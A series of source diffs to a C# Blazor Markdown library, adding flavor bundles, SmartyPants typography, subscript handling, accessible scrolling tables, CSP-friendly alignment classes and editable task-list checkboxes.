+    /// Sets the words the renderers write themselves - alert titles, footnote back-links, the
+    /// accessible names of the regions and controls the markup adds - so a rendered document can be
+    /// in a language other than English.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseTexts(this BitMarkdownPipelineBuilder b, BitMarkdownTexts texts)
+    {
+        ArgumentNullException.ThrowIfNull(b);
+        ArgumentNullException.ThrowIfNull(texts);
+        b.Texts = texts;
+        return b;
+    }
 
     /// <summary>Adds the full GitHub Flavored Markdown bundle: tables, strikethrough, task lists, autolinks, footnotes and alerts.</summary>
     public static BitMarkdownPipelineBuilder UseGitHubFlavored(this BitMarkdownPipelineBuilder b)
         => b.Use(new BitMarkdownGitHubFlavoredExtension());
 
-    /// <summary>Adds the GitHub flavors plus emoji and auto-identifiers.</summary>
+    /// <summary>
+    /// Adds the GitHub flavors plus front matter, the emphasis extras, containers, definition
+    /// lists, abbreviations, figures, emoji and auto-identifiers - everything that reads a
+    /// real-world document the way its author meant it, short of the two flavors that change what
+    /// was written: SmartyPants, which rewrites characters, and mathematics, which needs a
+    /// typesetter on the page to be worth anything.
+    /// </summary>
     public static BitMarkdownPipelineBuilder UseAdvanced(this BitMarkdownPipelineBuilder b)
-        => b.UseGitHubFlavored().UseEmojis().UseAutoIdentifiers();
+        => b.UseGitHubFlavored()
+            .UseFrontMatter()
+            .UseEmphasisExtras()
+            .UseContainers()
+            .UseDefinitionLists()
+            .UseAbbreviations()
+            .UseFigures()
+            .UseEmojis()
+            .UseAutoIdentifiers();
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownPipelineBuilderExtensions.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownPipelineBuilderExtensions.cs
@@ -1,4 +1,4 @@
-namespace Bit.BlazorUI;
+﻿namespace Bit.BlazorUI;
 
 /// <summary>Fluent helpers for enabling the built-in Markdown flavors.</summary>
 public static class BitMarkdownPipelineBuilderExtensions
@@ -24,6 +24,11 @@ public static class BitMarkdownPipelineBuilderExtensions
         => b.Use(new BitMarkdownEmojiExtension());
 
     /// <summary>Adds <c>:shortcode:</c> emoji replacement with per-pipeline emoji overrides.</summary>
+    /// <remarks>
+    /// A flavor is configured once. Call this before <see cref="UseAdvanced"/> - which adds emoji
+    /// itself, and defers to a configuration already made - rather than after it, where the second
+    /// call would be a second configuration of the same flavor and throws.
+    /// </remarks>
     public static BitMarkdownPipelineBuilder UseEmojis(this BitMarkdownPipelineBuilder b, IReadOnlyDictionary<string, string> overrides)
         => b.Use(new BitMarkdownEmojiExtension(overrides));
 
@@ -93,6 +98,11 @@ public static class BitMarkdownPipelineBuilderExtensions
     /// Adds automatic heading id slugs and, when <paramref name="anchorLinks"/> is <c>true</c>, a
     /// permalink after each heading so a reader can copy a link straight to that section.
     /// </summary>
+    /// <remarks>
+    /// A flavor is configured once. Call this before <see cref="UseAdvanced"/> - which adds
+    /// auto-identifiers itself, and defers to a configuration already made - rather than after it,
+    /// where the second call would be a second configuration of the same flavor and throws.
+    /// </remarks>
     public static BitMarkdownPipelineBuilder UseAutoIdentifiers(this BitMarkdownPipelineBuilder b, bool anchorLinks)
         => b.Use(new BitMarkdownAutoIdentifierExtension(anchorLinks));
 
@@ -109,6 +119,11 @@ public static class BitMarkdownPipelineBuilderExtensions
     /// sanitized again on the way out, so a rewriter can never reintroduce an unsafe destination;
     /// returning <c>null</c> drops the destination and keeps the text.
     /// </summary>
+    /// <remarks>
+    /// Unlike the other flavors this one may be added more than once, each rewrite running in turn
+    /// in the order it was added - so a base URL and a rewriter of your own compose, rather than
+    /// one of them being the only one that applies.
+    /// </remarks>
     public static BitMarkdownPipelineBuilder UseUrlRewriter(
         this BitMarkdownPipelineBuilder b, Func<BitMarkdownUrlRewriteContext, string?> rewrite)
         => b.Use(new BitMarkdownUrlRewriteExtension(rewrite));
@@ -116,8 +131,13 @@ public static class BitMarkdownPipelineBuilderExtensions
     /// <summary>
     /// Resolves every relative link and image destination against <paramref name="baseUrl"/> -
     /// what a README needs before it can be rendered anywhere but the repository it came from.
-    /// Absolute destinations and in-page fragments are left alone.
+    /// Absolute destinations and in-page fragments are left alone, and so are root-relative ones,
+    /// which are already resolved against the site root.
     /// </summary>
+    /// <remarks>
+    /// This is a URL rewrite like <see cref="UseUrlRewriter"/>, so the two compose: a base URL
+    /// followed by a rewriter of your own runs both, in that order.
+    /// </remarks>
     public static BitMarkdownPipelineBuilder UseBaseUrl(this BitMarkdownPipelineBuilder b, string baseUrl)
         => b.Use(BitMarkdownUrlRewriteExtension.ForBaseUrl(baseUrl));
 
@@ -162,14 +182,23 @@ public static class BitMarkdownPipelineBuilderExtensions
     /// was written: SmartyPants, which rewrites characters, and mathematics, which needs a
     /// typesetter on the page to be worth anything.
     /// </summary>
+    /// <remarks>
+    /// The two flavors here that take options - emoji overrides and the auto-identifier's
+    /// permalinks - are added only if they are not already on, so configuring one before the bundle
+    /// keeps that configuration instead of being overruled by the bundle's default.
+    /// </remarks>
     public static BitMarkdownPipelineBuilder UseAdvanced(this BitMarkdownPipelineBuilder b)
-        => b.UseGitHubFlavored()
+    {
+        ArgumentNullException.ThrowIfNull(b);
+
+        return b.UseGitHubFlavored()
             .UseFrontMatter()
             .UseEmphasisExtras()
             .UseContainers()
             .UseDefinitionLists()
             .UseAbbreviations()
             .UseFigures()
-            .UseEmojis()
-            .UseAutoIdentifiers();
+            .UseIfAbsent(new BitMarkdownEmojiExtension())
+            .UseIfAbsent(new BitMarkdownAutoIdentifierExtension());
+    }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownPipelineBuilderExtensions.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownPipelineBuilderExtensions.cs
@@ -31,11 +31,23 @@ public static class BitMarkdownPipelineBuilderExtensions
     public static BitMarkdownPipelineBuilder UseAutoIdentifiers(this BitMarkdownPipelineBuilder b)
         => b.Use(new BitMarkdownAutoIdentifierExtension());
 
-    /// <summary>Adds the full GitHub Flavored Markdown bundle.</summary>
+    /// <summary>Adds GitHub-style footnotes (<c>[^1]</c> plus a <c>[^1]: ...</c> definition).</summary>
+    public static BitMarkdownPipelineBuilder UseFootnotes(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownFootnoteExtension());
+
+    /// <summary>Adds GitHub alerts (<c>&gt; [!NOTE]</c>, <c>&gt; [!TIP]</c>, ...).</summary>
+    public static BitMarkdownPipelineBuilder UseAlerts(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownAlertExtension());
+
+    /// <summary>Renders every single newline as a line break, like a chat or comment box.</summary>
+    public static BitMarkdownPipelineBuilder UseSoftLineAsHardLine(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownSoftLineAsHardLineExtension());
+
+    /// <summary>Adds the full GitHub Flavored Markdown bundle: tables, strikethrough, task lists, autolinks, footnotes and alerts.</summary>
     public static BitMarkdownPipelineBuilder UseGitHubFlavored(this BitMarkdownPipelineBuilder b)
         => b.Use(new BitMarkdownGitHubFlavoredExtension());
 
-    /// <summary>Adds GFM plus emoji and auto-identifiers.</summary>
+    /// <summary>Adds the GitHub flavors plus emoji and auto-identifiers.</summary>
     public static BitMarkdownPipelineBuilder UseAdvanced(this BitMarkdownPipelineBuilder b)
         => b.UseGitHubFlavored().UseEmojis().UseAutoIdentifiers();
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownPipelines.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownPipelines.cs
@@ -13,9 +13,9 @@ public static class BitMarkdownPipelines
     /// <summary>Basic CommonMark core only (no flavors).</summary>
     public static BitMarkdownPipeline Basic => _basic.Value;
 
-    /// <summary>GitHub Flavored Markdown (tables, strikethrough, task lists, autolinks).</summary>
+    /// <summary>GitHub Flavored Markdown: tables, strikethrough, task lists, autolinks, footnotes and alerts.</summary>
     public static BitMarkdownPipeline GitHub => _gitHub.Value;
 
-    /// <summary>GFM plus emoji and auto-identifiers.</summary>
+    /// <summary>The GitHub flavors plus emoji and auto-identifiers.</summary>
     public static BitMarkdownPipeline Advanced => _advanced.Value;
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownSmartyPantsAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownSmartyPantsAstProcessor.cs
@@ -8,8 +8,10 @@ namespace Bit.BlazorUI;
 /// an ellipsis, and <c>&lt;&lt;</c> / <c>&gt;&gt;</c> become guillemets.
 /// </summary>
 /// <remarks>
-/// Only <see cref="BitMarkdownTextNode"/>s are rewritten, so code spans, code blocks and URLs -
-/// none of which are text nodes - keep every character exactly as it was written. Whether a quote
+/// Only <see cref="BitMarkdownTextNode"/>s are rewritten, so code spans, code blocks and the
+/// destinations of links - none of which are text nodes - keep every character exactly as it was
+/// written. An autolink is the one case where a destination <em>is</em> a text node, since its text
+/// is its URL, and it is left alone too. Whether a quote
 /// opens or closes is decided from the character before it, the same way a typesetter would: a
 /// quote after whitespace or an opening bracket opens, and every other one closes. That also gives
 /// <c>don't</c> its apostrophe.
@@ -31,13 +33,25 @@ public sealed class BitMarkdownSmartyPantsAstProcessor : BitMarkdownAstProcessor
         // Descendants walks the tree in document order, which is what lets one running "previous
         // character" carry from one text node to the next.
         char previous = '\0';
+        // An autolink's text is its destination, so educating it would leave the reader looking at
+        // a URL that is not the one the link goes to. Collected by identity as each autolink is
+        // reached - it comes before its own children in document order - since a flat walk has no
+        // way to skip a subtree.
+        HashSet<BitMarkdownNode>? verbatim = null;
 
         foreach (var node in BitMarkdownAstHelper.Descendants(document))
         {
             switch (node)
             {
+                case BitMarkdownLinkNode { IsAutoLink: true } autoLink:
+                    verbatim ??= new HashSet<BitMarkdownNode>(ReferenceEqualityComparer.Instance);
+                    foreach (var child in BitMarkdownAstHelper.Descendants(autoLink)) verbatim.Add(child);
+                    break;
+
                 case BitMarkdownTextNode text:
-                    text.Text = Educate(text.Text, previous);
+                    // Still read for what comes after it: the URL is text on the line, and a quote
+                    // right after it closes rather than opens.
+                    if (verbatim?.Contains(text) is not true) text.Text = Educate(text.Text, previous);
                     if (text.Text.Length > 0) previous = text.Text[^1];
                     break;
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownSmartyPantsAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownSmartyPantsAstProcessor.cs
@@ -1,0 +1,144 @@
+using System.Text;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Replaces the ASCII stand-ins authors type with the typographic characters they mean: straight
+/// quotes become curly ones, <c>--</c> and <c>---</c> become en and em dashes, <c>...</c> becomes
+/// an ellipsis, and <c>&lt;&lt;</c> / <c>&gt;&gt;</c> become guillemets.
+/// </summary>
+/// <remarks>
+/// Only <see cref="BitMarkdownTextNode"/>s are rewritten, so code spans, code blocks and URLs -
+/// none of which are text nodes - keep every character exactly as it was written. Whether a quote
+/// opens or closes is decided from the character before it, the same way a typesetter would: a
+/// quote after whitespace or an opening bracket opens, and every other one closes. That also gives
+/// <c>don't</c> its apostrophe.
+/// <para>
+/// That character is tracked across the whole block rather than per text node, because emphasis
+/// splits a sentence into several of them: in <c>"**bold**"</c> the closing quote is a text node of
+/// its own, and reading it in isolation would open a second quote instead of closing the first.
+/// </para>
+/// </remarks>
+public sealed class BitMarkdownSmartyPantsAstProcessor : BitMarkdownAstProcessor
+{
+    // After the flavors that read the raw text (task markers, autolink literals, abbreviations):
+    // rewriting an ellipsis or a quote inside a URL run before it was linked would change the
+    // destination.
+    public override int Order => 200;
+
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        // Descendants walks the tree in document order, which is what lets one running "previous
+        // character" carry from one text node to the next.
+        char previous = '\0';
+
+        foreach (var node in BitMarkdownAstHelper.Descendants(document))
+        {
+            switch (node)
+            {
+                case BitMarkdownTextNode text:
+                    text.Text = Educate(text.Text, previous);
+                    if (text.Text.Length > 0) previous = text.Text[^1];
+                    break;
+
+                // Code is not educated, but it is still text on the line: a quote right after it
+                // closes rather than opens.
+                case BitMarkdownCodeSpanNode code:
+                    if (code.Content.Length > 0) previous = code.Content[^1];
+                    break;
+
+                case BitMarkdownLineBreakNode:
+                    previous = ' ';
+                    break;
+
+                // A new block starts a new line of prose, so nothing before it can decide how its
+                // first quote leans.
+                case BitMarkdownParagraphNode:
+                case BitMarkdownHeadingNode:
+                case BitMarkdownListItemNode:
+                case BitMarkdownBlockquoteNode:
+                case BitMarkdownCodeBlockNode:
+                    previous = '\0';
+                    break;
+            }
+        }
+    }
+
+    /// <summary>Applies the substitutions to one run of text.</summary>
+    public static string Educate(string text) => Educate(text, '\0');
+
+    /// <summary>
+    /// Applies the substitutions to one run of text, continuing from
+    /// <paramref name="previous"/> - the last character of the run before it, or <c>'\0'</c> at the
+    /// start of a block.
+    /// </summary>
+    public static string Educate(string text, char previous)
+    {
+        if (string.IsNullOrEmpty(text)) return text;
+        if (text.AsSpan().IndexOfAny(".-\"'<>") < 0) return text;
+
+        var sb = new StringBuilder(text.Length);
+        for (int i = 0; i < text.Length; i++)
+        {
+            char c = text[i];
+            switch (c)
+            {
+                case '.' when Run(text, i, '.') >= 3:
+                    sb.Append('…');
+                    i += 2;
+                    continue;
+
+                case '-' when Run(text, i, '-') >= 3:
+                    sb.Append('—');
+                    i += 2;
+                    continue;
+
+                case '-' when Run(text, i, '-') == 2:
+                    sb.Append('–');
+                    i += 1;
+                    continue;
+
+                case '<' when Run(text, i, '<') >= 2:
+                    sb.Append('«');
+                    i += 1;
+                    continue;
+
+                case '>' when Run(text, i, '>') >= 2:
+                    sb.Append('»');
+                    i += 1;
+                    continue;
+
+                case '"':
+                    sb.Append(Opens(sb, previous) ? '“' : '”');
+                    continue;
+
+                case '\'':
+                    sb.Append(Opens(sb, previous) ? '‘' : '’');
+                    continue;
+
+                default:
+                    sb.Append(c);
+                    continue;
+            }
+        }
+        return sb.ToString();
+    }
+
+    private static int Run(string s, int start, char c)
+    {
+        int i = start;
+        while (i < s.Length && s[i] == c) i++;
+        return i - start;
+    }
+
+    // A quote opens when nothing readable precedes it - the start of a block, a space, or an
+    // opening bracket or dash. Everything else closes, which is also what turns the apostrophe in
+    // "don't" into the right glyph.
+    private static bool Opens(StringBuilder written, char previous)
+    {
+        char prev = written.Length > 0 ? written[^1] : previous;
+        if (prev == '\0') return true;
+
+        return char.IsWhiteSpace(prev) || prev is '(' or '[' or '{' or '—' or '–' or '“' or '‘';
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownSmartyPantsExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownSmartyPantsExtension.cs
@@ -1,0 +1,12 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables typographic replacement (SmartyPants): <c>"quotes"</c> and <c>'quotes'</c> curl,
+/// <c>--</c> and <c>---</c> become en and em dashes, <c>...</c> becomes an ellipsis, and
+/// <c>&lt;&lt;</c> / <c>&gt;&gt;</c> become guillemets. Code and URLs are left alone.
+/// </summary>
+public sealed class BitMarkdownSmartyPantsExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+        => builder.AstProcessors.Add(new BitMarkdownSmartyPantsAstProcessor());
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownSoftLineAsHardLineExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownSoftLineAsHardLineExtension.cs
@@ -1,0 +1,25 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Promotes every soft line break to a hard one, so a single newline inside a paragraph
+/// renders as <c>&lt;br /&gt;</c>. This is the behavior chat, comment and issue UIs expect,
+/// where authors do not think in terms of Markdown's paragraph reflow - the equivalent of
+/// the <c>breaks</c> option in marked and markdown-it.
+/// </summary>
+public sealed class BitMarkdownSoftLineAsHardLineExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+        => builder.AstProcessors.Add(new BitMarkdownSoftLineAsHardLineAstProcessor());
+}
+
+/// <summary>Marks every <see cref="BitMarkdownLineBreakNode"/> in the tree as a hard break.</summary>
+public sealed class BitMarkdownSoftLineAsHardLineAstProcessor : BitMarkdownAstProcessor
+{
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        foreach (var lineBreak in BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownLineBreakNode>())
+        {
+            lineBreak.Hard = true;
+        }
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownStrikethroughDelimiterProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownStrikethroughDelimiterProcessor.cs
@@ -1,10 +1,26 @@
 namespace Bit.BlazorUI;
 
-/// <summary>Delimiter processor for <c>~~</c> strikethrough runs.</summary>
+/// <summary>
+/// Delimiter processor for <c>~</c>: a run of two is GFM strikethrough, and - when
+/// <see cref="Subscript"/> is on, which the emphasis-extras flavor turns it on - a run of one is
+/// subscript. Both live in one processor because a delimiter character may only belong to one.
+/// </summary>
 public sealed class BitMarkdownStrikethroughDelimiterProcessor : BitMarkdownDelimiterProcessor
 {
+    /// <summary>Creates a processor that only recognizes <c>~~strikethrough~~</c>.</summary>
+    public BitMarkdownStrikethroughDelimiterProcessor() { }
+
+    /// <summary>
+    /// Creates a processor that also reads a single <c>~</c> as subscript when
+    /// <paramref name="subscript"/> is <c>true</c>.
+    /// </summary>
+    public BitMarkdownStrikethroughDelimiterProcessor(bool subscript) => Subscript = subscript;
+
+    /// <summary>True when a run of one <c>~</c> produces a <see cref="BitMarkdownSubscriptNode"/>.</summary>
+    public bool Subscript { get; }
+
     public override char[] Characters => new[] { '~' };
-    public override int MinRunLength => 2;
+    public override int MinRunLength => Subscript ? 1 : 2;
 
     public override (bool canOpen, bool canClose) GetFlanking(
         char c, bool leftFlanking, bool rightFlanking, char prev, char next)
@@ -14,14 +30,23 @@ public sealed class BitMarkdownStrikethroughDelimiterProcessor : BitMarkdownDeli
         List<BitMarkdownNode> children, out BitMarkdownNode? node)
     {
         // GFM strikethrough requires runs of two on both sides.
-        if (openLength < MinRunLength || closeLength < MinRunLength)
+        if (openLength >= 2 && closeLength >= 2)
         {
-            node = null;
-            return 0;
+            var strike = new BitMarkdownStrikethroughNode();
+            strike.Children.AddRange(children);
+            node = strike;
+            return 2;
         }
-        var strike = new BitMarkdownStrikethroughNode();
-        strike.Children.AddRange(children);
-        node = strike;
-        return MinRunLength;
+
+        if (Subscript && openLength >= 1 && closeLength >= 1)
+        {
+            var sub = new BitMarkdownSubscriptNode();
+            sub.Children.AddRange(children);
+            node = sub;
+            return 1;
+        }
+
+        node = null;
+        return 0;
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownStrikethroughExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownStrikethroughExtension.cs
@@ -5,7 +5,14 @@ public sealed class BitMarkdownStrikethroughExtension : IBitMarkdownExtension
 {
     public void Setup(BitMarkdownPipelineBuilder builder)
     {
-        builder.DelimiterProcessors.Add(new BitMarkdownStrikethroughDelimiterProcessor());
+        // The emphasis-extras flavor may already own '~' (it reads a single one as subscript), and
+        // a delimiter character may only belong to one processor. Its processor renders "~~" the
+        // same way, so leaving it in place is what makes the two flavors order-independent.
+        if (builder.DelimiterProcessors.Exists(p => Array.IndexOf(p.Characters, '~') >= 0) is false)
+        {
+            builder.DelimiterProcessors.Add(new BitMarkdownStrikethroughDelimiterProcessor());
+        }
+
         builder.Renderers.Add(new BitMarkdownStrikethroughRenderer());
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTableRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTableRenderer.cs
@@ -11,14 +11,26 @@ public sealed class BitMarkdownTableRenderer : BitMarkdownNodeRenderer
     {
         // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
         var table = (BitMarkdownTableNode)node;
-        b.OpenElement(0, "table");
 
-        b.OpenElement(1, "thead");
-        b.OpenElement(2, "tr");
+        // A wide table has to scroll somewhere. Scrolling the <table> itself (display: block) is
+        // the shortcut most Markdown stylesheets take, and it costs the element its table
+        // semantics - a screen reader stops announcing rows and columns. Scrolling a wrapper
+        // instead keeps them, and the wrapper is focusable so the overflow can be reached with
+        // the keyboard alone.
+        b.OpenElement(0, "div");
+        b.AddAttribute(1, "class", "bit-mdv-table-wrapper");
+        b.AddAttribute(2, "role", "region");
+        b.AddAttribute(3, "aria-label", r.Texts.Table);
+        b.AddAttribute(4, "tabindex", "0");
+
+        b.OpenElement(5, "table");
+
+        b.OpenElement(6, "thead");
+        b.OpenElement(7, "tr");
         for (int c = 0; c < table.Header.Count; c++)
         {
-            b.OpenElement(3, "th");
-            b.AddAttribute(4, "scope", "col");
+            b.OpenElement(8, "th");
+            b.AddAttribute(9, "scope", "col");
             AddAlignment(b, table, c);
             r.WriteNodes(b, table.Header[c]);
             b.CloseElement();
@@ -26,13 +38,13 @@ public sealed class BitMarkdownTableRenderer : BitMarkdownNodeRenderer
         b.CloseElement();
         b.CloseElement();
 
-        b.OpenElement(5, "tbody");
+        b.OpenElement(11, "tbody");
         foreach (var row in table.Rows)
         {
-            b.OpenElement(6, "tr");
+            b.OpenElement(12, "tr");
             for (int c = 0; c < row.Count; c++)
             {
-                b.OpenElement(7, "td");
+                b.OpenElement(13, "td");
                 AddAlignment(b, table, c);
                 r.WriteNodes(b, row[c]);
                 b.CloseElement();
@@ -41,6 +53,7 @@ public sealed class BitMarkdownTableRenderer : BitMarkdownNodeRenderer
         }
         b.CloseElement();
 
+        b.CloseElement();
         b.CloseElement();
     }
 
@@ -58,6 +71,6 @@ public sealed class BitMarkdownTableRenderer : BitMarkdownNodeRenderer
             _ => null
         };
         if (align is not null)
-            b.AddAttribute(8, "class", align);
+            b.AddAttribute(10, "class", align);
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTableRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTableRenderer.cs
@@ -44,17 +44,20 @@ public sealed class BitMarkdownTableRenderer : BitMarkdownNodeRenderer
         b.CloseElement();
     }
 
+    // Column alignment is applied with a class rather than an inline style attribute, so the
+    // rendered document still aligns under a strict Content-Security-Policy that does not
+    // allow 'unsafe-inline' for styles.
     private static void AddAlignment(RenderTreeBuilder b, BitMarkdownTableNode table, int col)
     {
         if (col >= table.Alignments.Count) return;
         string? align = table.Alignments[col] switch
         {
-            BitMarkdownColumnAlignment.Left => "left",
-            BitMarkdownColumnAlignment.Center => "center",
-            BitMarkdownColumnAlignment.Right => "right",
+            BitMarkdownColumnAlignment.Left => "bit-mdv-align-left",
+            BitMarkdownColumnAlignment.Center => "bit-mdv-align-center",
+            BitMarkdownColumnAlignment.Right => "bit-mdv-align-right",
             _ => null
         };
         if (align is not null)
-            b.AddAttribute(8, "style", $"text-align:{align}");
+            b.AddAttribute(8, "class", align);
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskCheckboxNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskCheckboxNode.cs
@@ -9,10 +9,18 @@ public sealed class BitMarkdownTaskCheckboxNode : BitMarkdownNode
     public bool Checked { get; set; }
 
     /// <summary>
-    /// The checkbox's position in the document, counted from 0 in reading order. It is what
-    /// identifies the marker to toggle in the source, since two items may read identically.
+    /// The checkbox's position in the document, counted from 0 in reading order. It is what names
+    /// the box to a host storing what a reader ticked, since two items may read identically.
     /// </summary>
     public int Index { get; set; }
+
+    /// <summary>
+    /// The document line the <c>[ ]</c> marker was written on, counted from 0, or <c>-1</c> when
+    /// the box cannot be traced back to the source. This is the line
+    /// <see cref="BitMarkdownTaskList.Toggle(string, BitMarkdownTaskCheckboxNode, bool)"/> rewrites,
+    /// so the box a reader ticked and the marker that is edited are the same one by construction.
+    /// </summary>
+    public int SourceLine { get; set; } = -1;
 
     /// <summary>
     /// Set by the viewer when the host is listening for task changes. A checkbox with a handler is

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskCheckboxNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskCheckboxNode.cs
@@ -1,7 +1,23 @@
+using Microsoft.AspNetCore.Components;
+
 namespace Bit.BlazorUI;
 
 /// <summary>A GitHub task-list checkbox at the start of a list item.</summary>
 public sealed class BitMarkdownTaskCheckboxNode : BitMarkdownNode
 {
-    public bool Checked { get; init; }
+    /// <summary>Whether the box was written as ticked (<c>[x]</c>).</summary>
+    public bool Checked { get; set; }
+
+    /// <summary>
+    /// The checkbox's position in the document, counted from 0 in reading order. It is what
+    /// identifies the marker to toggle in the source, since two items may read identically.
+    /// </summary>
+    public int Index { get; set; }
+
+    /// <summary>
+    /// Set by the viewer when the host is listening for task changes. A checkbox with a handler is
+    /// rendered enabled and reports its new state here; one without stays the read-only box GitHub
+    /// renders, so a document nobody is editing cannot be half-edited.
+    /// </summary>
+    public EventCallback<ChangeEventArgs>? OnChange { get; set; }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskCheckboxRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskCheckboxRenderer.cs
@@ -1,8 +1,12 @@
+using System.Globalization;
 using Microsoft.AspNetCore.Components.Rendering;
 
 namespace Bit.BlazorUI;
 
-/// <summary>Renders <see cref="BitMarkdownTaskCheckboxNode"/> as a disabled checkbox.</summary>
+/// <summary>
+/// Renders <see cref="BitMarkdownTaskCheckboxNode"/> as a checkbox - disabled, the way GitHub
+/// renders one, unless the host is listening for changes to it.
+/// </summary>
 public sealed class BitMarkdownTaskCheckboxRenderer : BitMarkdownNodeRenderer
 {
     public override bool Accept(BitMarkdownNode node) => node is BitMarkdownTaskCheckboxNode;
@@ -11,11 +15,20 @@ public sealed class BitMarkdownTaskCheckboxRenderer : BitMarkdownNodeRenderer
     {
         // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
         var task = (BitMarkdownTaskCheckboxNode)node;
+        bool interactive = task.OnChange is { HasDelegate: true };
+
         b.OpenElement(0, "input");
         b.AddAttribute(1, "type", "checkbox");
         b.AddAttribute(2, "class", "task-list-item-checkbox");
-        b.AddAttribute(3, "disabled", true);
+        if (interactive is false) b.AddAttribute(3, "disabled", true);
         if (task.Checked) b.AddAttribute(4, "checked", true);
+        if (interactive)
+        {
+            // A checkbox with no visible label of its own is named after the item it opens, which
+            // is the text right beside it.
+            b.AddAttribute(5, "aria-label", string.Format(CultureInfo.CurrentCulture, r.Texts.Task, task.Index + 1));
+            b.AddAttribute(6, "onchange", task.OnChange!.Value);
+        }
         b.CloseElement();
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskList.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskList.cs
@@ -1,22 +1,24 @@
-using System.Text.RegularExpressions;
-
 namespace Bit.BlazorUI;
 
 /// <summary>
 /// Helpers for editing task markers in a Markdown source, so a ticked box can be written back into
 /// the document it came from.
 /// </summary>
-public static partial class BitMarkdownTaskList
+/// <remarks>
+/// The boxes are found by parsing, never by scanning the source for something that looks like a
+/// marker. A second scanner would have to agree with the parser about every rule that decides
+/// whether a <c>- [ ]</c> is a task - what a code fence is, how far a list item's content is
+/// indented, whether a block quote's contents count - and wherever the two disagreed, the box a
+/// reader ticked and the marker that got rewritten would be different ones. Parsing instead means
+/// the boxes counted here are exactly the boxes drawn, by construction.
+/// </remarks>
+public static class BitMarkdownTaskList
 {
-    // A list marker followed by a task box. The three parts are captured separately so the box can
-    // be rewritten without touching the indentation or the marker.
-    [GeneratedRegex(@"^([ \t]*(?:[-+*]|[0-9]{1,9}[.)])[ \t]+\[)([ xX])(\].*)$", RegexOptions.None, matchTimeoutMilliseconds: 1000)]
-    private static partial Regex TaskLine();
-
-    // The fence that opens or closes a code block, whose contents are not Markdown and whose
-    // "- [ ]" lines are therefore not tasks.
-    [GeneratedRegex(@"^ {0,3}(`{3,}|~{3,})", RegexOptions.None, matchTimeoutMilliseconds: 1000)]
-    private static partial Regex CodeFence();
+    // The flavors that decide which "- [ ]" markers exist. Task lists need their own extension,
+    // and a marker may sit anywhere the block parsers can reach one, so the whole advanced set is
+    // used rather than a lone UseTaskLists() that would miss a task inside a container.
+    private static readonly Lazy<BitMarkdownPipeline> _pipeline
+        = new(() => new BitMarkdownPipelineBuilder().UseAdvanced().Build());
 
     /// <summary>
     /// Returns <paramref name="markdown"/> with the task marker at <paramref name="index"/> - the
@@ -24,74 +26,115 @@ public static partial class BitMarkdownTaskList
